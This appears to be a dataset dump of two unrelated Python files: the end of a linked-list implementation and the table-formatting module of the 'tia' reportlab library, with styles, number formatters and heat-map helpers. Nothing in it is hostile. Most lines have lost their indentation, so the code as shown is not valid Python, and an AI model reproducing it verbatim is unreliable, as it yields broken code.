curr_node = curr_node.next
curr_index += 1
        if prev_node:
            # splice the new node in front of curr_node
            new_node.next = curr_node
            prev_node.next = new_node
        else:
            # inserting at position 0 makes the new node the head
            new_node.next = self.head
            self.head = new_node
self.size += 1
def find(self, value):
"""
Find an element in the list
:param value: data to find
"""
curr_node = self.head
while curr_node is not None:
if curr_node.data == value:
return curr_node
curr_node = curr_node.next
if curr_node is None:
raise ValueError('{} not found'.format(value))
def find_at(self, position):
"""
Get the element at a given position
:param position: index to retrieve
"""
if position >= self.size:
raise IndexError
curr_node = self.head
curr_index = 0
while curr_index < position:
curr_node = curr_node.next
curr_index += 1
return curr_node
def delete(self, value):
"""
Remove an element in the list.
:param value: data to remove
"""
curr_node = self.head
prev_node = None
# walk the list
while curr_node is not None:
# if we find a match, short circuit the loop.
if curr_node.data == value:
break
# if we don't match, update the previous elements "pointer"
# to the target's "next"
else:
prev_node = curr_node
curr_node = curr_node.next
# raise if we haven't found anything
if curr_node is None:
raise ValueError('{} not found'.format(value))
if prev_node is not None:
prev_node.next = curr_node.next
else:
self.head = curr_node.next
self.size -= 1
def delete_at(self, position):
"""
Remove the element at a given index.
:param position: index to remove
"""
if position >= self.size:
raise IndexError
curr_node = self.head
prev_node = None
curr_index = 0
# walk the list
while curr_index < position:
prev_node = curr_node
curr_node = curr_node.next
curr_index += 1
if prev_node is not None:
prev_node.next = curr_node.next
else:
self.head = curr_node.next
self.size -= 1
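# Minimal usage sketch for SinglyLinkedList (added for illustration, not part of
# the original module):
#
#   sll = SinglyLinkedList()
#   sll.append(1)          # 1
#   sll.prepend(0)         # 0 -> 1
#   sll.append(2)          # 0 -> 1 -> 2
#   sll.find(1)            # returns the node holding 1
#   sll.delete_at(0)       # 1 -> 2
#   sll.size               # 2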
class DoublyLinkedListNode():
def __init__(self):
self.data = None
self.next = None
self.prev = None
class DoublyLinkedList():
def __init__(self):
self.head = None
self.size = 0
def prepend(self, value):
"""
Add an element at the head of the list. Point the new element's 'next'
at the previous head, shifting all remaining elements to the right.
:param value: data to add
"""
new_node = DoublyLinkedListNode()
new_node.data = value
# If we have a DLL B <-> C and prepend A, we should get A <-> B <-> C
curr_head = self.head
new_node.next = curr_head
new_node.prev = None
if curr_head is not None:
curr_head.prev = new_node
self.head = new_node
self.size += 1
def append(self, value):
"""
Add an element at the tail of the list. Update the previous final
element's 'next' to point to the new element.
:param value: data to add
"""
new_node = DoublyLinkedListNode()
new_node.data = value
curr_node = self.head
prev_node = None
while curr_node is not None:
prev_node = curr_node
curr_node = curr_node.next
if prev_node:
prev_node.next = new_node
new_node.prev = prev_node
else:
self.head = new_node
self.size += 1
def insert(self, value):
"""
Insert an element in the list.
This method exists for convenient naming.
:param value: data to add
"""
self.prepend(value)
def insert_at(self, value, position):
"""
Insert an element at a specified position.
This method exists for convenient naming.
:param value: data to add
:param position: index to insert at
"""
if position >= self.size:
raise IndexError
new_node = DoublyLinkedListNode()
new_node.data = value
curr_node = self.head
prev_node = None
curr_index = 0
while curr_index < position:
prev_node = curr_node
curr_node = curr_node.next
curr_index += 1
        if prev_node:
            # splice the new node between prev_node and curr_node
            new_node.next = curr_node
            new_node.prev = prev_node
            prev_node.next = new_node
            curr_node.prev = new_node
        else:
            # inserting at position 0 makes the new node the head
            new_node.next = self.head
            self.head.prev = new_node
            self.head = new_node
self.size += 1
def find(self, value):
"""
Find an element in the list
:param value: data to find
"""
curr_node = self.head
while curr_node is not None:
if curr_node.data == value:
return curr_node
curr_node = curr_node.next
if curr_node is None:
raise ValueError('{} not found'.format(value))
def find_at(self, position):
"""
Get the element at a given position
:param position: index to retrieve
"""
if position >= self.size:
raise IndexError
curr_node = self.head
curr_index = 0
while curr_index < position:
curr_node = curr_node.next
curr_index += 1
return curr_node
def delete(self, value):
"""
Remove an element in the list.
:param value: data to remove
"""
curr_node = self.head
prev_node = None
# walk the list
while curr_node is not None:
# if we find a match, short circuit the loop.
if curr_node.data == value:
break
# if we don't match, update the previous elements "pointer"
# to the target's "next"
else:
prev_node = curr_node
curr_node = curr_node.next
# raise if we haven't found anything
if curr_node is None:
raise ValueError('{} not found'.format(value))
        if prev_node is None:
            # removing the head: the new head (if any) must drop its back-link
            self.head = curr_node.next
            if curr_node.next is not None:
                curr_node.next.prev = None
        elif curr_node.next is not None:
            prev_node.next = curr_node.next
            curr_node.next.prev = prev_node
        else:
            prev_node.next = curr_node.next
self.size -= 1
def delete_at(self, position):
"""
Remove the element at a given index.
:param position: index to remove
"""
if position >= self.size:
raise IndexError
curr_node = self.head
prev_node = None
curr_index = 0
# walk the list
while curr_index < position:
prev_node = curr_node
curr_node = curr_node.next
curr_index += 1
        if prev_node is None:
            # removing the head: the new head (if any) must drop its back-link
            self.head = curr_node.next
            if curr_node.next is not None:
                curr_node.next.prev = None
        elif curr_node.next is not None:
            prev_node.next = curr_node.next
            curr_node.next.prev = prev_node
        else:
            prev_node.next = curr_node.next
self.size -= 1
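# Minimal usage sketch for DoublyLinkedList (illustrative only):
#
#   dll = DoublyLinkedList()
#   for value in (3, 2, 1):
#       dll.prepend(value)              # head becomes 1 <-> 2 <-> 3
#   node = dll.find(2)
#   node.prev.data, node.next.data      # (1, 3)
#   dll.delete(2)                       # 1 <-> 3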
|
py | b4112934d5c56f754f0b25e22a7f1f629c355312 | from reportlab.platypus import Table, TableStyle, Flowable
from reportlab.lib.colors import grey, white, HexColor, black, gray
from matplotlib.colors import rgb2hex, LinearSegmentedColormap
from matplotlib.pyplot import get_cmap
import numpy as np
import pandas as pd
from tia.rlab.components import KeepInFrame
import tia.util.fmt as fmt
__all__ = [
"ConditionalRedBlack",
"DynamicTable",
"TableFormatter",
"RegionFormatter",
"IntFormatter",
"FloatFormatter",
"PercentFormatter",
"ThousandsFormatter",
"MillionsFormatter",
"BillionsFormatter",
"DollarCentsFormatter",
"DollarFormatter",
"ThousandDollarsFormatter",
"MillionDollarsFormatter",
"BillionDollarsFormatter",
"YmdFormatter",
"Y_m_dFormatter",
"DynamicNumberFormatter",
"BorderTypeGrid",
"BorderTypeHorizontal",
"BorderTypeOutline",
"BorderTypeOutline",
"BorderTypeVertical",
"Style",
"BorderTypeOutlineCols",
]
DefaultHeaderStyle = {
"GRID": (0.5, grey),
"BOX": (0.25, black),
"VALIGN": "MIDDLE",
"LEADING": 6,
"LEFTPADDING": 3,
"RIGHTPADDING": 3,
"BOTTOMPADDING": 3,
"TOPPADDING": 3,
"FONTSIZE": 6,
"BACKGROUND": HexColor("#404040"),
"FONTNAME": "Helvetica",
"ALIGN": "CENTER",
"TEXTCOLOR": white,
}
DefaultCellStyle = {
"GRID": (0.5, grey),
"BOX": (0.25, black),
"VALIGN": "MIDDLE",
"LEADING": 6,
"LEFTPADDING": 3,
"RIGHTPADDING": 3,
"BOTTOMPADDING": 2,
"TOPPADDING": 2,
"ALIGN": "CENTER",
"TEXTCOLOR": black,
"ROWBACKGROUNDS": [[HexColor("#e3ebf4"), white]],
"FONTSIZE": 6,
"FONTNAME": "Helvetica", # "FONTNAME": "Courier"
}
DefaultIndexStyle = {
"GRID": (0.5, grey),
"BOX": (0.25, black),
"VALIGN": "MIDDLE",
"LEADING": 6,
"LEFTPADDING": 3,
"RIGHTPADDING": 3,
"BOTTOMPADDING": 2,
"TOPPADDING": 2,
"ALIGN": "RIGHT",
"TEXTCOLOR": black,
"ROWBACKGROUNDS": [[HexColor("#e3ebf4"), white]],
"FONTSIZE": 6,
"FONTNAME": "Helvetica",
}
DefaultWeight = 0.7
AlignRight = {"ALIGN": "RIGHT"}
ConditionalRedBlack = lambda x: x < 0 and dict(TEXTCOLOR=HexColor("#800000"))
def pad_positive_wrapper(fmtfct):
"""Ensure that numbers are aligned in table by appending a blank space to postive values if 'parenthesis' are
used to denote negative numbers"""
def check_and_append(*args, **kwargs):
result = fmtfct(*args, **kwargs)
if fmtfct.parens and not result.endswith(")"):
result += " "
return result
return check_and_append
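# Illustration of pad_positive_wrapper with a stand-in formatter (hypothetical;
# only the `parens` attribute read by the wrapper is assumed):
#
#   def toy(v):
#       return '(%d)' % -v if v < 0 else '%d' % v
#   toy.parens = True
#   padded = pad_positive_wrapper(toy)
#   padded(-5)   # '(5)'
#   padded(5)    # '5 '  <- trailing space keeps digits aligned with '(5)'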
IntFormatter = pad_positive_wrapper(fmt.new_int_formatter(nan="-"))
FloatFormatter = pad_positive_wrapper(fmt.new_float_formatter(nan="-"))
PercentFormatter = pad_positive_wrapper(fmt.new_percent_formatter(nan="-"))
ThousandsFormatter = pad_positive_wrapper(fmt.new_thousands_formatter(nan="-"))
MillionsFormatter = pad_positive_wrapper(fmt.new_millions_formatter(nan="-"))
BillionsFormatter = pad_positive_wrapper(fmt.new_billions_formatter(nan="-"))
# Don't attempt to pad
DynamicNumberFormatter = fmt.DynamicNumberFormat(
method="col", nan="-", pcts=1, trunc_dot_zeros=1
)
DollarCentsFormatter = pad_positive_wrapper(
fmt.new_float_formatter(prefix="$", nan="-")
)
DollarFormatter = pad_positive_wrapper(fmt.new_int_formatter(prefix="$", nan="-"))
ThousandDollarsFormatter = pad_positive_wrapper(
fmt.new_thousands_formatter(prefix="$", nan="-")
)
MillionDollarsFormatter = pad_positive_wrapper(
fmt.new_millions_formatter(prefix="$", nan="-")
)
BillionDollarsFormatter = pad_positive_wrapper(
fmt.new_billions_formatter(prefix="$", nan="-")
)
YmdFormatter = fmt.new_datetime_formatter("%Y%m%d", True)
Y_m_dFormatter = fmt.new_datetime_formatter("%Y-%m-%d", True)
mdYFormatter = fmt.new_datetime_formatter("%m/%d/%Y", True)
class DynamicTable(Table):
def __init__(self, data, on_wrap=None, **kwargs):
self.on_wrap = on_wrap
Table.__init__(self, data, **kwargs)
self._longTableOptimize = 0
def wrap(self, awidth, aheight):
self.on_wrap and self.on_wrap(self, awidth, aheight)
return Table.wrap(self, awidth, aheight)
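# Usage sketch for the on_wrap hook (illustrative): the callback fires each time
# reportlab asks the table to size itself and receives the available width and
# height, which allows late, layout-time adjustments.
#
#   seen = []
#   def record_avail(table, avail_width, avail_height):
#       seen.append((avail_width, avail_height))
#   tbl = DynamicTable([['a', 'b'], [1, 2]], on_wrap=record_avail)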
def is_contiguous(idx):
if len(idx) > 0:
s0, s1 = idx.min(), idx.max()
expected = pd.Int64Index(np.array(list(range(s0, s1 + 1))))
# return idx.isin(expected).all()
return expected.isin(idx).all()
def find_locations(index, match_value_or_fct, levels=None, max_matches=0):
matches = []
fct = match_value_or_fct
if not callable(fct):
match_value = match_value_or_fct
if not isinstance(match_value, str) and hasattr(match_value, "__iter__"):
fct = lambda v: v in match_value
else:
fct = lambda v: v == match_value_or_fct
for lvl, loc, val in level_iter(index, levels):
if fct(val):
matches.append(loc)
            if max_matches and len(matches) >= max_matches:
break
return matches
def level_iter(index, levels=None):
if levels is None:
levels = list(range(index.nlevels))
elif np.isscalar(levels):
levels = [levels]
for level in levels:
for i, v in enumerate(index.get_level_values(level)):
yield level, i, v
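# Example of level_iter / find_locations on a MultiIndex (illustrative):
#
#   idx = pd.MultiIndex.from_tuples([('A', 1), ('A', 2), ('B', 1)])
#   list(level_iter(idx, levels=0))                  # [(0, 0, 'A'), (0, 1, 'A'), (0, 2, 'B')]
#   find_locations(idx, 'B', levels=0)               # [2]
#   find_locations(idx, lambda v: v == 1, levels=1)  # [0, 2]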
def span_iter(series):
sorted = series.sort_index()
isnull = pd.isnull(sorted).values
isnulleq = isnull[1:] & isnull[:-1]
iseq = sorted.values[1:] == sorted.values[:-1]
eq = isnulleq | iseq
li = 0
for i in range(len(eq)):
islast = i == (len(eq) - 1)
if eq[i]: # if currently true then consecutive
if islast or not eq[i + 1]:
yield sorted.index[li], sorted.index[i + 1]
else:
li = i + 1
    # falling off the end terminates the generator (an explicit StopIteration
    # here would become a RuntimeError under PEP 479 / Python 3.7+)
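# Example of span_iter (illustrative): runs of consecutive equal values (or
# consecutive NaNs) in a Series are reported as (first_index, last_index) pairs.
#
#   s = pd.Series(['x', 'x', 'y', 'y', 'y'], index=range(5))
#   list(span_iter(s))   # [(0, 1), (2, 4)]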
class BorderType(object):
def __init__(
self,
weight=DefaultWeight,
color=black,
cap=None,
dashes=None,
join=None,
count=None,
space=None,
):
args = locals()
args.pop("self")
self.kwargs = args
def apply(self, rng, **overrides):
args = self.kwargs.copy()
args.update(overrides)
self._do_apply(rng, args)
def _do_apply(self, rng, args):
raise NotImplementedError()
class BorderTypeGrid(BorderType):
def _do_apply(self, rng, args):
rng.set_grid(**args)
class BorderTypeOutline(BorderType):
def _do_apply(self, rng, args):
rng.set_box(**args)
class BorderTypeHorizontal(BorderType):
def _do_apply(self, rng, args):
fct = lambda r: (r.set_lineabove(**args), r.set_linebelow(**args))
[fct(row) for row in rng.iter_rows()]
class BorderTypeOutlineCols(BorderType):
def _do_apply(self, rng, args):
[col.set_box(**args) for col in rng.iter_cols()]
class BorderTypeVertical(BorderType):
def _do_apply(self, rng, args):
fct = lambda r: (r.set_linebefore(**args), r.set_lineafter(**args))
[fct(col) for col in rng.iter_cols()]
class Style(object):
Blue = {
"Light": HexColor("#dce6f1"),
"Medium": HexColor("#95b3d7"),
"Dark": HexColor("#4f81bd"),
}
Black = {"Light": HexColor("#d9d9d9"), "Medium": HexColor("#6c6c6c"), "Dark": black}
Red = {
"Light": HexColor("#f2dcdb"),
"Medium": HexColor("#da9694"),
"Dark": HexColor("#c0504d"),
}
Lime = {
"Light": HexColor("#ebf1de"),
"Medium": HexColor("#c4d79b"),
"Dark": HexColor("#9bbb59"),
}
Purple = {
"Light": HexColor("#e4dfec"),
"Medium": HexColor("#b1a0c7"),
"Dark": HexColor("#8064a2"),
}
Orange = {
"Light": HexColor("#fde9d9"),
"Medium": HexColor("#fabf8f"),
"Dark": HexColor("#f79646"),
}
Cyan = {
"Light": HexColor("#eff4f6"),
"Medium": HexColor("#a8c2cb"),
"Dark": HexColor("#3b595f"),
}
DarkBlue = {
"Light": HexColor("#e5eaee "),
"Medium": HexColor("#9aabbc"),
"Dark": HexColor("#042f59"),
}
@staticmethod
def apply_basic(
formatter,
font="Helvetica",
font_bold="Helvetica-Bold",
font_size=8,
rpad=None,
lpad=None,
bpad=None,
tpad=None,
colspans=1,
rowspans=0,
):
        lpad = 4.0 / 8.0 * font_size if lpad is None else lpad
        rpad = 4.0 / 8.0 * font_size if rpad is None else rpad
        bpad = 4.0 / 8.0 * font_size if bpad is None else bpad
        tpad = 4.0 / 8.0 * font_size if tpad is None else tpad
formatter.all.set_font(font, size=font_size, leading=font_size)
formatter.all.set_pad(lpad, bpad, rpad, tpad)
formatter.all.set_valign_middle()
# do the default things
formatter.header.set_font(font_bold)
formatter.header.set_align_center()
formatter.index_header.set_font(font_bold)
formatter.index_header.set_align_left()
formatter.index.set_font(font_bold)
formatter.index.set_align_left()
formatter.cells.set_font(font)
formatter.cells.set_align_right()
# do col spans and row spans
if rowspans and formatter.index.ncols > 1:
formatter.index.iloc[:, : formatter.index.ncols - 1].detect_rowspans()
if colspans and formatter.header.nrows > 1:
formatter.header.iloc[: formatter.header.nrows - 1, :].detect_colspans()
@staticmethod
def apply_color(
formatter,
cmap=None,
font_bw=1,
stripe_rows=1,
stripe_cols=0,
hdr_border_clazz=BorderTypeGrid,
cell_border_clazz=BorderTypeOutline,
border_weight=0.7,
):
"""
font_bw: bool, If True use black and white fonts. If False, then use the cmap
"""
cmap = cmap or Style.Blue
light = cmap.get("Light", white)
medium = cmap.get("Medium", gray)
dark = cmap.get("Dark", black)
# the ranges
header = formatter.all.iloc[: formatter.header.nrows]
cells = formatter.all.iloc[formatter.header.nrows :]
# color the header
hdr_border_clazz and header.set_border_type(
hdr_border_clazz, color=medium, weight=border_weight
)
header.set_textcolor(font_bw and white or light)
header.set_background(dark)
# color the cells
cell_border_clazz and cells.set_border_type(
cell_border_clazz, color=medium, weight=border_weight
)
stripe_rows and cells.set_row_backgrounds([light, white])
stripe_cols and cells.set_col_backgrounds([white, light])
not font_bw and cells.set_textcolor(dark)
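# Typical combination (illustrative): apply the structural defaults first, then
# one of the colour maps defined above. `tf` is assumed to be a TableFormatter
# built from a DataFrame (see the class further down in this module).
#
#   tf = TableFormatter(df)
#   Style.apply_basic(tf, font_size=7)
#   Style.apply_color(tf, cmap=Style.DarkBlue, stripe_rows=1)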
class RegionFormatter(object):
def __init__(self, parent, row_ilocs, col_ilocs):
self.row_ilocs = row_ilocs
self.col_ilocs = col_ilocs
self.parent = parent
self.style_cmds = parent.style_cmds
self.is_contiguous_rows = isrcont = is_contiguous(row_ilocs)
self.is_contiguous_cols = isccont = is_contiguous(col_ilocs)
self.iloc = _RegionIX(self, "iloc")
# Build coord arrays for easy iteration
if isccont:
self.col_coord_tuples = [(col_ilocs.min(), col_ilocs.max())]
else:
self.col_coord_tuples = list(zip(col_ilocs, col_ilocs))
if isrcont:
self.row_coord_tuples = [(row_ilocs.min(), row_ilocs.max())]
else:
self.row_coord_tuples = list(zip(row_ilocs, row_ilocs))
@property
def nrows(self):
return len(self.row_ilocs)
@property
def ncols(self):
return len(self.col_ilocs)
@property
def last_row(self):
return self.empty_frame() if self.nrows == 0 else self.iloc[-1:, :]
@property
def last_col(self):
return self.empty_frame() if self.ncols == 0 else self.iloc[:, -1:]
def is_empty(self):
return self.nrows == 0 and self.ncols == 0
@property
def formatted_values(self):
return self.parent.formatted_values.iloc[self.row_ilocs, self.col_ilocs]
@property
def actual_values(self):
return self.parent.actual_values.iloc[self.row_ilocs, self.col_ilocs]
def new_instance(self, local_row_idxs, local_col_idxs):
rows = pd.Int64Index([self.row_ilocs[r] for r in local_row_idxs])
cols = pd.Int64Index([self.col_ilocs[c] for c in local_col_idxs])
return RegionFormatter(self.parent, rows, cols)
def empty_frame(self):
return self.new_instance([], [])
def match_column_labels(
self, match_value_or_fct, levels=None, max_matches=0, empty_res=1
):
"""Check the original DataFrame's column labels to find a subset of the current region
:param match_value_or_fct: value or function(hdr_value) which returns True for match
:param levels: [None, scalar, indexer]
:param max_matches: maximum number of columns to return
:return:
"""
allmatches = self.parent._find_column_label_positions(
match_value_or_fct, levels
)
# only keep matches which are within this region
matches = [m for m in allmatches if m in self.col_ilocs]
if max_matches and len(matches) > max_matches:
matches = matches[:max_matches]
if matches:
return RegionFormatter(self.parent, self.row_ilocs, pd.Int64Index(matches))
elif empty_res:
return self.empty_frame()
def match_row_labels(
self, match_value_or_fct, levels=None, max_matches=0, empty_res=1
):
"""Check the original DataFrame's row labels to find a subset of the current region
:param match_value_or_fct: value or function(hdr_value) which returns True for match
:param levels: [None, scalar, indexer]
:param max_matches: maximum number of columns to return
:return:
"""
allmatches = self.parent._find_row_label_positions(match_value_or_fct, levels)
# only keep matches which are within this region
matches = [m for m in allmatches if m in self.row_ilocs]
if max_matches and len(matches) > max_matches:
matches = matches[:max_matches]
if matches:
return RegionFormatter(self.parent, pd.Int64Index(matches), self.col_ilocs)
elif empty_res:
return self.empty_frame()
def match_any_labels(
self, match_value_or_fct, levels=None, max_matches=0, empty_res=1
):
res = self.match_column_labels(
match_value_or_fct, levels, max_matches, empty_res=0
)
res = res or self.match_row_labels(
match_value_or_fct, levels, max_matches, empty_res
)
return res
def iter_rows(self, start=None, end=None):
"""Iterate each of the Region rows in this region"""
start = start or 0
end = end or self.nrows
for i in range(start, end):
yield self.iloc[i, :]
def iter_cols(self, start=None, end=None):
"""Iterate each of the Region cols in this region"""
start = start or 0
end = end or self.ncols
for i in range(start, end):
yield self.iloc[:, i]
def __repr__(self):
return repr(self.formatted_values)
def apply_style(self, cmd, *args):
"""
Apply the specified style cmd to this region. For example, set all fonts to size 12, apply_style('FONTSIZE', 12)
:param cmd: reportlab format command
:param args: arguments for the cmd
:return: self
"""
for c0, c1 in self.col_coord_tuples:
for r0, r1 in self.row_coord_tuples:
c = [cmd, (c0, r0), (c1, r1)] + list(args)
self.style_cmds.append(c)
return self
def apply_styles(self, cmdmap):
"""
Apply the set of commands defined in cmdmap. for example, apply_styles({'FONTSIZE': 12, 'BACKGROUND': white})
:param cmdmap: dict of commands mapped to the command arguments
:return: self
"""
is_list_like = lambda arg: isinstance(arg, (list, tuple))
is_first_param_list = lambda c: c in ("COLBACKGROUNDS", "ROWBACKGROUNDS")
for cmd, args in cmdmap.items():
if not is_list_like(args):
args = [args]
elif (
is_first_param_list(cmd)
and is_list_like(args)
and not is_list_like(args[0])
):
args = [args]
self.apply_style(cmd, *args)
return self
def apply_conditional_styles(self, cbfct):
"""
Ability to provide dynamic styling of the cell based on its value.
:param cbfct: function(cell_value) should return a dict of format commands to apply to that cell
:return: self
"""
for ridx in range(self.nrows):
for cidx in range(self.ncols):
fmts = cbfct(self.actual_values.iloc[ridx, cidx])
fmts and self.iloc[ridx, cidx].apply_styles(fmts)
return self
def detect_colspans(self, use_actual=1):
"""Determine if any col spans are present in the values.
:param use_actual: if True, check actual_values for span. if False, use the formatted_values
:return: self
"""
vals = self.actual_values if use_actual else self.formatted_values
if self.is_contiguous_cols:
for ridx in range(self.nrows):
for c0, c1 in span_iter(vals.iloc[ridx, :]):
actual_idx = self.row_ilocs[ridx]
self.style_cmds.append(["SPAN", (c0, actual_idx), (c1, actual_idx)])
return self
def detect_rowspans(self, use_actual=1):
"""Determine if any row spans are present in the values.
:param use_actual: if True, check actual_values for span. if False, use the formatted_values
:return: self
"""
""" Determine if any row spans are present"""
vals = self.actual_values if use_actual else self.formatted_values
if self.is_contiguous_rows:
for cidx in range(self.ncols):
for r0, r1 in span_iter(vals.iloc[:, cidx]):
actual_idx = self.col_ilocs[cidx]
self.style_cmds.append(["SPAN", (actual_idx, r0), (actual_idx, r1)])
return self
def detect_spans(self, colspans=1, rowspans=1, use_actual=1):
colspans and self.detect_colspans(use_actual)
rowspans and self.detect_rowspans(use_actual)
def apply_format(self, fmtfct):
"""
For each cell in the region, invoke fmtfct(cell_value) and store result in the formatted_values
:param fmtfct: function(cell_value) which should return a formatted value for display
:return: self
"""
for ridx in range(self.nrows):
for cidx in range(self.ncols):
# MUST set the parent as local view is immutable
riloc = self.row_ilocs[ridx]
ciloc = self.col_ilocs[cidx]
self.parent.formatted_values.iloc[riloc, ciloc] = fmtfct(
self.actual_values.iloc[ridx, cidx]
)
return self
def apply_rowattrs(self, **kwargs):
for k, v in kwargs.items():
            self.parent.rowattrs.loc[self.row_ilocs, k] = v
return self
def apply_colattrs(self, **kwargs):
for k, v in kwargs.items():
self.parent.colattrs.loc[self.col_ilocs, k] = v
return self
def apply(self, **kwargs):
"""
Accepts the following keys:
'styles': see apply_styles for args
'cstyles': see apply_condition_styles for args
'format': see apply_format for args
'c': col width (array or scalar)
'cmin': min col width (array or scalar)
'cmax': max col width (array or scalar)
'cweight: col weight use at runtime to determine width
'r': row height (array or scalar)
'rmin': min row height (array or scalar)
'rmax': max row height (array or scalar)
'rweight: row weight use at runtime to determine height
'cspans': detect colspans
'rspans': detect rowspans
'spans': bool, detetch both rowspans and colspans
@param kwargs:
@return:
"""
def _apply_if_avail(key, fct):
if key in kwargs:
val = kwargs.pop(key)
if val is not None:
fct(val)
_apply_if_avail("styles", lambda v: self.apply_styles(v))
_apply_if_avail("cstyles", lambda v: self.apply_conditional_styles(v))
_apply_if_avail("format", lambda v: self.apply_format(v))
_apply_if_avail("c", lambda v: self.apply_colattrs(value=v))
_apply_if_avail("cmin", lambda v: self.apply_colattrs(min=v))
_apply_if_avail("cmax", lambda v: self.apply_colattrs(max=v))
_apply_if_avail("cweight", lambda v: self.apply_colattrs(weight=v))
_apply_if_avail("r", lambda v: self.apply_rowattrs(value=v))
_apply_if_avail("rmin", lambda v: self.apply_rowattrs(min=v))
_apply_if_avail("rmax", lambda v: self.apply_rowattrs(max=v))
_apply_if_avail("rweight", lambda v: self.apply_rowattrs(weight=v))
_apply_if_avail("rspans", lambda v: v and self.detect_rowspans())
_apply_if_avail("cspans", lambda v: v and self.detect_colspans())
_apply_if_avail(
"spans", lambda v: v and (self.detect_rowspans(), self.detect_colspans())
)
def apply_number_format(self, formatter, rb=1, align=1):
styles = align and AlignRight or {}
cstyles = rb and ConditionalRedBlack or None
self.apply(format=formatter, styles=styles, cstyles=cstyles)
return self
def _do_number_format(self, rb, align, fmt_fct, fmt_args, defaults):
args = {}
defaults and args.update(defaults)
fmt_args and args.update(fmt_args)
f = pad_positive_wrapper(fmt_fct(**args))
return self.apply_number_format(f, rb=rb, align=align)
def percent_format(self, rb=1, align=1, **fmt_args):
defaults = {"precision": 2, "nan": "-"}
return self._do_number_format(
rb, align, fmt.new_percent_formatter, fmt_args, defaults
)
def int_format(self, rb=1, align=1, **fmt_args):
defaults = {"nan": "-"}
return self._do_number_format(
rb, align, fmt.new_int_formatter, fmt_args, defaults
)
def float_format(self, rb=1, align=1, **fmt_args):
defaults = {"precision": 2, "nan": "-"}
return self._do_number_format(
rb, align, fmt.new_float_formatter, fmt_args, defaults
)
def thousands_format(self, rb=1, align=1, **fmt_args):
defaults = {"precision": 1, "nan": "-"}
return self._do_number_format(
rb, align, fmt.new_thousands_formatter, fmt_args, defaults
)
def millions_format(self, rb=1, align=1, **fmt_args):
defaults = {"precision": 1, "nan": "-"}
return self._do_number_format(
rb, align, fmt.new_millions_formatter, fmt_args, defaults
)
def billions_format(self, rb=1, align=1, **fmt_args):
defaults = {"precision": 1, "nan": "-"}
return self._do_number_format(
rb, align, fmt.new_billions_formatter, fmt_args, defaults
)
def guess_number_format(self, rb=1, align=1, **fmt_args):
"""Determine the most appropriate formatter by inspected all the region values"""
fct = fmt.guess_formatter(self.actual_values, **fmt_args)
return self.apply_number_format(fct, rb=rb, align=align)
def guess_format(self, rb=1, align=1, **fmt_args):
from tia.util.fmt import NumberFormat
fct = fmt.guess_formatter(self.actual_values, **fmt_args)
        if isinstance(fct, NumberFormat):
return self.apply_number_format(fct, rb=rb, align=align)
else:
return self.apply_format(fct)
def dynamic_number_format(self, rb=1, align=1, **fmt_args):
"""Formatter changes based on the cell value"""
        fct = fmt.DynamicNumberFormat(**fmt_args)
return self.apply_number_format(fct, rb=rb, align=align)
# def heat_map(self, cmap=None, min=None, max=None, font_cmap=None):
def heat_map(self, cmap="RdYlGn", vmin=None, vmax=None, font_cmap=None):
if cmap is None:
carr = ["#d7191c", "#fdae61", "#ffffff", "#a6d96a", "#1a9641"]
cmap = LinearSegmentedColormap.from_list("default-heatmap", carr)
if isinstance(cmap, str):
cmap = get_cmap(cmap)
if isinstance(font_cmap, str):
font_cmap = get_cmap(font_cmap)
vals = self.actual_values.astype(float)
if vmin is None:
vmin = vals.min().min()
if vmax is None:
vmax = vals.max().max()
norm = (vals - vmin) / (vmax - vmin)
for ridx in range(self.nrows):
for cidx in range(self.ncols):
v = norm.iloc[ridx, cidx]
if np.isnan(v):
continue
color = cmap(v)
hex = rgb2hex(color)
styles = {"BACKGROUND": HexColor(hex)}
if font_cmap is not None:
styles["TEXTCOLOR"] = HexColor(rgb2hex(font_cmap(v)))
self.iloc[ridx, cidx].apply_styles(styles)
return self
heatmap = heat_map
def set_font(self, name=None, size=None, leading=None, color=None):
name and self.set_fontname(name)
size and self.set_fontsize(size)
leading and self.set_leading(leading)
color and self.set_textcolor(color)
return self
def set_fontname(self, name):
return self.apply_style("FONTNAME", name)
def set_fontsize(self, size):
return self.apply_style("FONTSIZE", size)
def set_textcolor(self, color):
return self.apply_style("TEXTCOLOR", color)
def set_leading(self, n):
return self.apply_style("LEADING", n)
def set_valign(self, pos):
return self.apply_style("VALIGN", pos)
def set_valign_middle(self):
return self.set_valign("MIDDLE")
def set_valign_center(self):
return self.set_valign_middle()
def set_valign_top(self):
return self.set_valign("TOP")
def set_valign_bottom(self):
return self.set_valign("BOTTOM")
def set_align(self, pos):
return self.apply_style("ALIGN", pos)
def set_align_center(self):
return self.set_align("CENTER")
def set_align_middle(self):
return self.set_align_center()
def set_align_left(self):
return self.set_align("LEFT")
def set_align_right(self):
return self.set_align("RIGHT")
def set_pad(self, left, bottom, right, top):
return self.set_lpad(left).set_bpad(bottom).set_rpad(right).set_tpad(top)
def set_lpad(self, n):
return self.apply_style("LEFTPADDING", n)
def set_bpad(self, n):
return self.apply_style("BOTTOMPADDING", n)
def set_rpad(self, n):
return self.apply_style("RIGHTPADDING", n)
def set_tpad(self, n):
return self.apply_style("TOPPADDING", n)
def set_box(
self,
weight=DefaultWeight,
color=None,
cap=None,
dashes=None,
join=None,
count=None,
space=None,
):
return self.apply_style("BOX", weight, color, cap, dashes, join, count, space)
def set_grid(
self,
weight=DefaultWeight,
color=None,
cap=None,
dashes=None,
join=None,
count=None,
space=None,
):
return self.apply_style("GRID", weight, color, cap, dashes, join, count, space)
def set_lineabove(
self,
weight=DefaultWeight,
color=None,
cap=None,
dashes=None,
join=None,
count=None,
space=None,
):
return self.apply_style(
"LINEABOVE", weight, color, cap, dashes, join, count, space
)
def set_linebelow(
self,
weight=DefaultWeight,
color=None,
cap=None,
dashes=None,
join=None,
count=None,
space=None,
):
return self.apply_style(
"LINEBELOW", weight, color, cap, dashes, join, count, space
)
def set_linebefore(
self,
weight=DefaultWeight,
color=None,
cap=None,
dashes=None,
join=None,
count=None,
space=None,
):
return self.apply_style(
"LINEBEFORE", weight, color, cap, dashes, join, count, space
)
def set_lineafter(
self,
weight=DefaultWeight,
color=None,
cap=None,
dashes=None,
join=None,
count=None,
space=None,
):
return self.apply_style(
"LINEAFTER", weight, color, cap, dashes, join, count, space
)
def set_border_type(
self,
clazz,
weight=DefaultWeight,
color=None,
cap=None,
dashes=None,
join=None,
count=None,
space=None,
):
"""example: set_border_type(BorderTypePartialRows) would set a border above and below each row in the range"""
args = locals()
args.pop("clazz")
args.pop("self")
clazz(**args).apply(self)
def set_background(self, color):
return self.apply_style("BACKGROUND", color)
def set_col_backgrounds(self, colors):
